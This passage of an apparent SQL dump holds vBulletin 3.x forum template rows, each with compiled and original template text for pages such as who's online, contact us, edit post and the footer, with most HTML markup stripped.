\") : (\"\")).\"\r\n $userinfo[where]\r\n
\r\n \") : (\"\")).\"\r\n \r\n\r\n \".(($show[\'ip\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($GLOBALS[\'vbulletin\']->options[\'showimicons\']) ? (\"\r\n \r\n $userinfo[aimicon]\r\n $userinfo[icqicon]\r\n $userinfo[msnicon]\r\n $userinfo[yahooicon]\r\n $userinfo[skypeicon]\r\n \r\n \") : (\"\")).\"\r\n\r\n ', '\r\n\r\n \r\n $userinfo[time] \r\n \r\n $userinfo[musername] $userinfo[hidden]+ \r\n \r\n $spidertype $userinfo[musername] \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n $userinfo[where]\r\n
\r\n \r\n \r\n\r\n \r\n \r\n
\r\n $userinfo[host] \r\n \r\n $userinfo[host]\r\n \r\n
$userinfo[useragent]\r\n
\r\n \r\n\r\n \r\n \r\n $userinfo[aimicon]\r\n $userinfo[icqicon]\r\n $userinfo[msnicon]\r\n $userinfo[yahooicon]\r\n $userinfo[skypeicon]\r\n \r\n \r\n\r\n ', 'template', 1144776885, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1707, -1, 'whosonline_resolveip', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$metarefresh\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[whos_online] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $vbphrase[resolve_ip_address] \r\n \r\n\r\n $vbphrase[ip_address] \r\n $ipaddress \r\n \r\n\r\n $vbphrase[resolved_host_name] \r\n \".(($resolved_host) ? (\"$resolved_host\") : (\"$vbphrase[unable_resolve_ip] \")).\" \r\n \r\n
\r\n\r\n$forumjump\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$metarefresh\r\n$vboptions[bbtitle] - $vbphrase[whos_online] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $vbphrase[resolve_ip_address] \r\n \r\n\r\n $vbphrase[ip_address] \r\n $ipaddress \r\n \r\n\r\n $vbphrase[resolved_host_name] \r\n $resolved_host$vbphrase[unable_resolve_ip] \r\n \r\n
\r\n\r\n$forumjump\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729845, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1708, -1, 'activateform', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[activate_your_account] \r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"$navbar\") : (\" \")).\"\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[activate_your_account] \r\n\r\n\r\n$header\r\n$navbar \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875352, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1709, -1, 'activate_requestemail', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[email_activation_codes] \r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"$navbar\") : (\" \")).\"\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[email_activation_codes] \r\n\r\n\r\n$header\r\n$navbar \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875371, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1710, -1, 'attachmentbit', '\r\n \r\n session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\" target=\\\"_blank\\\">$attachment[filename] \r\n \r\n \r\n $attachment[filesize]\r\n \r\n \r\n $attachment[counter]\r\n \r\n ', '\r\n \r\n $vbphrase[file_type_x]\" width=\"16\" height=\"16\" border=\"0\" style=\"vertical-align:middle\" /> $attachment[filename] \r\n \r\n \r\n $attachment[filesize]\r\n \r\n \r\n $attachment[counter]\r\n \r\n ', 'template', 1138633087, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1711, -1, 'ATTACHMENTS', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[attachments] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" \r\n\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[attachments]\r\n \r\n \r\n\r\n $vbphrase[attachment] \r\n $vbphrase[size] \r\n $vbphrase[views] \r\n \r\n$attachments\r\n\r\n \r\n \r\n
\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[attachments] - $vboptions[bbtitle] \r\n\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[attachments]\r\n \r\n \r\n\r\n $vbphrase[attachment] \r\n $vbphrase[size] \r\n $vbphrase[views] \r\n \r\n$attachments\r\n\r\n \r\n \r\n
\r\n\r\n\r\n', 'template', 1195729840, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1712, -1, 'board_inactive_warning', '$vbphrase[alert_board_off]
\r\n', '$vbphrase[alert_board_off]
\r\n', 'template', 1070144171, 'vBulletin Solutions', '', 'vbulletin'),
(1713, -1, 'contactus', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[contact_us] \r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"$navbar\") : (\" \")).\"\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\".(($show[\'errors\']) ? (\"\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted]: \r\n \r\n \r\n \r\n $errormessages \r\n \r\n \r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n $vbphrase[send_email_to_forum_administrator] \r\n $vbphrase[contact_us]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[your_details] \r\n \r\n \r\n\r\n
\r\n $vbphrase[subject] \r\n \r\n \r\n\r\n $human_verify\r\n\r\n
\r\n $vbphrase[message]: \r\n $message \r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[contact_us] \r\n\r\n\r\n$header\r\n$navbar \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted]: \r\n \r\n \r\n \r\n $errormessages \r\n \r\n \r\n
\r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[send_email_to_forum_administrator] \r\n $vbphrase[contact_us]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[your_details] \r\n \r\n \r\n\r\n
\r\n $vbphrase[subject] \r\n \r\n \r\n\r\n $human_verify\r\n\r\n
\r\n $vbphrase[message]: \r\n $message \r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1265204281, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1714, -1, 'contactus_option', ' $title
\r\n', ' $title
\r\n', 'template', 1068724587, 'vBulletin Solutions', '', 'vbulletin'),
(1715, -1, 'converse', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$usercss\r\n$memberinfo_css\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n
\r\n
\r\n \".(($show[\'usercss_switch\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n $pagetitle\r\n
\r\n $html\r\n
\r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$usercss\r\n$memberinfo_css\r\n\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n
\r\n
\r\n
\r\n \r\n \r\n $pagetitle\r\n
\r\n $html\r\n
\r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1204913623, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'),
(1716, -1, 'editpoll', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[edit_poll] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[thread] : $threadinfo[prefix_plain_html] session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title] \r\n $vbphrase[edit_poll]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $usernamecode\r\n\r\n
\r\n
$vbphrase[poll_question] :
\r\n
options[\'titlemaxchars\'] . \"\\\" />\r\n
\r\n\r\n
\r\n $vbphrase[poll_options] \r\n \r\n \r\n\r\n
\r\n $vbphrase[poll_timeout] \r\n \r\n \r\n\r\n \".(($show[\'makeprivate\']) ? (\"\r\n
\r\n $vbphrase[poll_options] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n $vbphrase[close_poll] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[edit_poll] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[thread] : $threadinfo[prefix_plain_html] $threadinfo[title] \r\n $vbphrase[edit_poll]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $usernamecode\r\n\r\n
\r\n
$vbphrase[poll_question] :
\r\n
\r\n
\r\n\r\n
\r\n $vbphrase[poll_options] \r\n \r\n \r\n\r\n
\r\n $vbphrase[poll_timeout] \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[poll_options] \r\n \r\n \r\n \r\n\r\n
\r\n $vbphrase[close_poll] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875524, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1717, -1, 'editpost', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[edit_post] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'deletepostoption\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[delete_this_message]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n \".(($show[\'firstpostnote\']) ? (\"\r\n
$vbphrase[deleting_message_deletion_of_thread]
\r\n \") : (\"\")).\"\r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n
$vbphrase[reason_for_deletion]:
\r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n$postpreview\r\n\r\noptions[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \".(($show[\'podcasturl\']) ? (\"\r\n \r\n
\r\n $vbphrase[podcast_options] \r\n\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n $attachmentoption\r\n\r\n \".(($show[\'member\']) ? (\"\r\n
\r\n $vbphrase[thread_subscription] \r\n \r\n \r\n $vbphrase[notification_type]:\r\n $vbphrase[do_not_subscribe] \r\n $vbphrase[no_email_notification] \r\n $vbphrase[instant_email_notification] \r\n $vbphrase[daily_email_notification] \r\n $vbphrase[weekly_email_notification] \r\n \r\n \".(($show[\'subscriptionfolders\']) ? (\"$vbphrase[folder]:$folderbits \") : (\"\")).\"\r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n $threadmanagement\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[edit_post] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[delete_this_message]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n
\r\n $vbphrase[deleting_message_deletion_of_thread]
\r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n
$vbphrase[reason_for_deletion]:
\r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n$postpreview\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n \r\n \r\n $vbphrase[podcast_options] \r\n\r\n \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n \r\n\r\n $attachmentoption\r\n\r\n
\r\n \r\n $vbphrase[thread_subscription] \r\n \r\n \r\n $vbphrase[notification_type]:\r\n $vbphrase[do_not_subscribe] \r\n $vbphrase[no_email_notification] \r\n $vbphrase[instant_email_notification] \r\n $vbphrase[daily_email_notification] \r\n $vbphrase[weekly_email_notification] \r\n \r\n $vbphrase[folder]:$folderbits \r\n \r\n
\r\n \r\n \r\n\r\n $threadmanagement\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875542, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1718, -1, 'footer', '$ad_location[ad_footer_start]\r\n\r\n \r\n$vbphrase[all_times_are_gmt_x_time_now_is_y]
\r\n \r\n\r\n$spacer_close\r\n\r\n\r\noptions[\'forumhome\'] . \".php\\\" method=\\\"get\\\" style=\\\"clear:$stylevar[left]\\\">\r\n\r\n\r\n\r\n \".(($show[\'quickchooser\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'languagechooser\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n
\r\n \r\n $vbphrase[powered_by_vbulletin]\r\n \r\n
\r\n\r\n
\r\n \r\n $cronimage\r\n \r\n\r\n \" . $GLOBALS[\'vbulletin\']->options[\'copyrighttext\'] . \"\r\n
\r\n
\r\n\r\n \r\n\r\n$ad_location[ad_footer_end]\r\n\r\n\".(($show[\'dst_correction\']) ? (\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n', '$ad_location[ad_footer_start]\r\n\r\n \r\n$vbphrase[all_times_are_gmt_x_time_now_is_y]
\r\n \r\n\r\n$spacer_close\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n
\r\n \r\n $vbphrase[powered_by_vbulletin]\r\n \r\n
\r\n\r\n
\r\n \r\n $cronimage\r\n \r\n\r\n $vboptions[copyrighttext]\r\n
\r\n
\r\n\r\n \r\n\r\n$ad_location[ad_footer_end]\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n', 'template', 1238157005, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1719, -1, 'forumjump', '\r\n
\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n $vbphrase[forum_jump] \r\n \r\n \r\n $vbphrase[user_control_panel] \r\n $vbphrase[private_messages] \r\n $vbphrase[subscriptions] \r\n $vbphrase[whos_online] \r\n $vbphrase[search_forums] \r\n $vbphrase[forums_home] \r\n \r\n \".(($jumpforumbits) ? (\"\r\n \r\n $jumpforumbits\r\n \r\n \") : (\"\")).\"\r\n $gobutton\r\n \r\n', '\r\n
\r\n \r\n \r\n $vbphrase[forum_jump] \r\n \r\n \r\n $vbphrase[user_control_panel] \r\n $vbphrase[private_messages] \r\n $vbphrase[subscriptions] \r\n $vbphrase[whos_online] \r\n $vbphrase[search_forums] \r\n $vbphrase[forums_home] \r\n \r\n \r\n \r\n $jumpforumbits\r\n \r\n \r\n $gobutton\r\n \r\n', 'template', 1207568337, 'vBulletin Solutions', '3.7.0 Release Candidate 3', 'vbulletin'),
(1720, -1, 'forumrules', '\r\n\r\n\r\n \r\n \r\n $vbphrase[posting_rules]\r\n \r\n \r\n \r\n\r\n\r\n \r\n \".((!$show[\'codeonly\']) ? (\"\r\n
\".(($can[\'postnew\']) ? (\"$vbphrase[you_may_post_new_threads]\") : (\"$vbphrase[you_may_not_post_new_threads]\")).\"
\r\n
\".(($can[\'reply\']) ? (\"$vbphrase[you_may_post_replies]\") : (\"$vbphrase[you_may_not_post_replies]\")).\"
\r\n
\".(($can[\'attachment\']) ? (\"$vbphrase[you_may_post_attachments]\") : (\"$vbphrase[you_may_not_post_attachments]\")).\"
\r\n
\".(($can[\'editpost\']) ? (\"$vbphrase[you_may_edit_your_posts]\") : (\"$vbphrase[you_may_not_edit_your_posts]\")).\"
\r\n
\r\n \") : (\"\")).\"\r\n
\" . construct_phrase(\"$vbphrase[bb_code_is_x]\", \"misc.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=bbcode\", \"$bbcodeon\") . \"
\r\n
\" . construct_phrase(\"$vbphrase[smilies_are_x]\", \"misc.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=showsmilies\", \"$smilieson\") . \"
\r\n
\" . construct_phrase(\"$vbphrase[img_code_is_x]\", \"misc.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=bbcode#imgcode\", \"$imgcodeon\") . \"
\r\n
\" . construct_phrase(\"$vbphrase[html_code_is_x]\", \"$htmlcodeon\") . \"
\r\n
\r\n
\" . construct_phrase(\"$vbphrase[forum_rules_link]\", \"misc.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=showrules\") . \"
\r\n
\r\n \r\n \r\n
', '\r\n\r\n\r\n \r\n \r\n $vbphrase[posting_rules]\r\n \r\n \r\n \r\n\r\n\r\n \r\n
\r\n $vbphrase[you_may_post_new_threads] $vbphrase[you_may_not_post_new_threads]
\r\n $vbphrase[you_may_post_replies] $vbphrase[you_may_not_post_replies]
\r\n $vbphrase[you_may_post_attachments] $vbphrase[you_may_not_post_attachments]
\r\n $vbphrase[you_may_edit_your_posts] $vbphrase[you_may_not_edit_your_posts]
\r\n \r\n \r\n
\r\n
\r\n
\r\n
$vbphrase[html_code_is_x] \r\n
\r\n
$vbphrase[forum_rules_link] \r\n
\r\n \r\n \r\n
', 'template', 1220350089, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1721, -1, 'GENERIC_SHELL', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$HTML\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$HTML\r\n\r\n$footer\r\n\r\n', 'template', 1217841292, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1722, -1, 'gobutton', ' ', ' ', 'template', 1094827546, 'vBulletin Solutions', '', 'vbulletin'),
(1723, -1, 'header', '\r\n \r\n\r\n\r\n\r\n\r\n$spacer_open\r\n\r\n$_phpinclude_output\r\n\r\n$ad_location[ad_header_end]', '\r\n \r\n\r\n\r\n \r\n \r\n \r\n
\r\n\r\n\r\n\r\n$spacer_open\r\n\r\n$_phpinclude_output\r\n\r\n$ad_location[ad_header_end]', 'template', 1197565670, 'vBulletin Solutions', '3.7.0 Beta 2', 'vbulletin'),
(1724, -1, 'headinclude', ' \r\n options[\'templateversion\'] . \"\\\" />\r\n\".(($show[\'threadinfo\']) ? (\"\r\n options[\'keywords\'] . \"\\\" />\r\n 1) ? (\"\" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"-\") : (\"\")).\"$threadinfo[prefix_plain_html] $threadinfo[title] $foruminfo[title_clean]\\\" />\r\n\") : (\"\".(($show[\'foruminfo\']) ? (\"\r\n options[\'keywords\'] . \"\\\" />\r\n 1) ? (\"\" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"-\") : (\"\")).\"$foruminfo[description_clean]\\\" />\r\n\") : (\"\r\n options[\'keywords\'] . \"\\\" />\r\n options[\'description\'] . \"\\\" />\r\n\")).\"\")).\"\r\n\r\n\r\n$style[css]\r\n\".((is_browser(\'opera\') AND !is_browser(\'opera\', \'8.0.1\')) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\".(($show[\'editor_css\']) ? (\"\r\n$editor_css\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n\r\n\".(($GLOBALS[\'vbulletin\']->options[\'externalrss\']) ? (\"\r\n options[\'bbtitle\'] . \" RSS Feed\\\" href=\\\"external.php?type=RSS2\\\" />\r\n \".(($show[\'foruminfo\'] OR $show[\'threadinfo\']) ? (\"\r\n options[\'bbtitle\'] . \" - $foruminfo[title_clean] - RSS Feed\\\" href=\\\"external.php?type=RSS2&forumids=$foruminfo[forumid]\\\" />\r\n \") : (\"\")).\"\r\n\") : (\"\")).\"', ' \r\n \r\n\r\n $threadinfo[taglist], $threadinfo[prefix_plain_html] $threadinfo[title], $vboptions[keywords]\" />\r\n 1\">$vbphrase[page_x] -$threadinfo[prefix_plain_html] $threadinfo[title] $foruminfo[title_clean]\" />\r\n\r\n \r\n 1\">$vbphrase[page_x] - $foruminfo[description_clean]\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n$style[css]\r\n\r\n\r\n \r\n\r\n$editor_css\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n ', 'template', 1208875321, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1725, -1, 'JOINREQUESTS', '\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[requests_to_join_usergroup] : \r\n $usergroupbits \r\n $gobutton\r\n \r\n \".(($show[\'pagenav\']) ? (\"$pagenav \") : (\"\")).\"\r\n \r\n
\r\n\r\n \r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n ', '\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[requests_to_join_usergroup] : \r\n $usergroupbits \r\n $gobutton\r\n \r\n $pagenav \r\n \r\n
\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n ', 'template', 1208876777, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1726, -1, 'joinrequestsbit', '\r\n \r\n \r\n $request[date] $request[time]
\r\n \r\n $request[reason] \r\n $vbphrase[accept] \r\n $vbphrase[deny] \r\n $vbphrase[ignore] \r\n \r\n', '\r\n \r\n \r\n $request[date] $request[time]
\r\n \r\n $request[reason] \r\n $vbphrase[accept] \r\n $vbphrase[deny] \r\n $vbphrase[ignore] \r\n \r\n', 'template', 1070058174, 'vBulletin Solutions', '', 'vbulletin'),
(1727, -1, 'lightbox', '', '', 'template', 1249925863, 'vBulletin Solutions', '3.8.4', 'vbulletin'),
(1728, -1, 'lostpw', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[lost_password_recovery_form] \r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"$navbar\") : (\" \")).\"\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[lost_password_recovery_form] \r\n\r\n\r\n$header\r\n$navbar \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1215529226, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1729, -1, 'mailform', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[send_message] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[send_message] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875831, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1730, -1, 'optgroup', '\".(($optgroup_options) ? (\"\r\n\r\n$optgroup_options\r\n \r\n\") : (\"\")).\"', '\r\n\r\n$optgroup_options\r\n \r\n ', 'template', 1207568486, 'vBulletin Solutions', '3.7.0 Release Candidate 3', 'vbulletin'),
(1731, -1, 'option', '$optiontitle \r\n', '$optiontitle \r\n', 'template', 1069841143, 'vBulletin Solutions', '', 'vbulletin'),
(1732, -1, 'reportitem', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $forminfo[reportphrase] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n $forminfo[reporttype] : $forminfo[itemname] \r\n $forminfo[reportphrase]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $usernamecode\r\n\r\n \r\n
\r\n
$vbphrase[message]:
\r\n
\r\n
\r\n \r\n\r\n
\r\n $forminfo[description]\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n $forminfo[hiddenfields]\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $forminfo[reportphrase] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n $forminfo[reporttype] : $forminfo[itemname] \r\n $forminfo[reportphrase]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $usernamecode\r\n\r\n \r\n
\r\n
$vbphrase[message]:
\r\n
\r\n
\r\n \r\n\r\n
\r\n $forminfo[description]\r\n
